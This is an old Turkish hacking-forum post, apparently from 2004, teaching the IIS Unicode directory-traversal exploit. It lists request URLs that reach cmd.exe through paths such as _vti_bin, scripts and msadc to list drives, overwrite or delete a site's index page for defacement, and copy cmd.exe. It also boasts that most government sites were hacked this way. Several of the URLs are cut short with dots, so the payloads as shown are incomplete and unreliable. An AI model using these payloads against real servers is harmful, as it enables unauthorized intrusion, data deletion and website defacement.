| Forumları Okundu Yap |
04-04-04, 23:23
|
#1 |
|
iss server da unicode açıklarını bulmak için cgi scanner programı öneririm unicode açığı olup olmadığına bakıyor sadece . iss server lar yani nt serverlarda unicode exploiti web browserdan yazarak hallediliyor www.darkface.org yazar gibi
http://www.darkface.org/_vti_bin/......exe?/c+dir+c:\ eğer web browser den bu tü scripi yazıp benim web dosyalrımı görüyorsan tamam içerdesindir devlet sitelerin çoğu bu tür hacklenmiştir sisteme root olarak giriyoruz bizim root dizinimiz C:\Inetpub\wwwroot\ içerdeyiz benim index dosylarımın nerde olduğunu windows gezginini kurcalar gibi buluruz herneyse uzatmadan hacked yazalım http://www.darkface.org/scripts/..%...tem32/cmd.exe? c+echo+darkface>+c:\Inetpub\wwwroot\index.htm aha index gitti hacked by darkface yazdı http://www.darkface.org/_vti_bin/.....wroot\index.htm index silindi yada olmadı http://www.darkface.org/_vti_bin/.....tem32/cmd.exe? c+del+c:\Inetpub\ http://www.darkface.org/_vti_bin/.....wroot\index.htm içeriğine bakmak için http://www.darkface.org/_vti_bin/.....c:\autoexec.exe cmd.exe mizi copy yapmak için sisteme gene girmek için eğer ilk yazdığım artık olmazsa http://www.darkface.org/_vti_bin/......exe?/c+dir+c:\ bu açılar çıkar girmeye denersin iss server açığı http://www.darkface.org/msadc/..%c0....exe?/c+dir+c:\ http://www.darkface.org/scripts/..%....exe?/c+dir+c:\ http://www.darkface.org/cgi-bin/..\....exe?/c+dir+c:\ yeni iss ver.larda bu yok |
|
| Kapalı Konu |
| Konu Araçları | |
|
|
unicode hacked iss açıkları
burda herkes online ... meydan sizlere kalsın
coğu win tabanlılar unicode lar patchli ama hala bu açık olan serverlar var
